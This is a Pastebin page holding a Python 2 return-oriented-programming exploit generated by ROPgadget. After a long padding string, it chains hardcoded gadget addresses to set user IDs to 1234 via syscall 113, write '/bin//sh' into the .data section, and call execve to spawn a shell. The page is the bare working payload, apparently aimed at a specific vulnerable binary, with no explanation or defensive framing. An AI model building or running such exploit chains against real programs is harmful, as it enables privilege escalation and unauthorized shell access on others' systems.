Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # execve generated by ROPgadget
- from struct import pack
- # Padding goes here
- p = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
- p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
- p += pack('<Q', 113) # setruid
- p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
- p += pack('<Q', 1234)
- p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
- p += pack('<Q', 1234)
- p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
- p += pack('<Q', 1234)
- p += pack('<Q', 0x0000000000400488) # syscall
- p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
- p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
- p += pack('<Q', 0x00000000006c0000) # @ .data
- p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
- p += '/bin//sh'
- p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
- p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
- p += pack('<Q', 0x00000000006c0008) # @ .data + 8
- p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
- p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
- p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
- p += pack('<Q', 0x00000000006c0000) # @ .data
- p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
- p += pack('<Q', 0x00000000006c0008) # @ .data + 8
- p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
- p += pack('<Q', 0x00000000006c0008) # @ .data + 8
- p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
- p += pack('<Q', 59) # sys_execve
- p += pack('<Q', 0x0000000000400488) # syscall
- print p
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
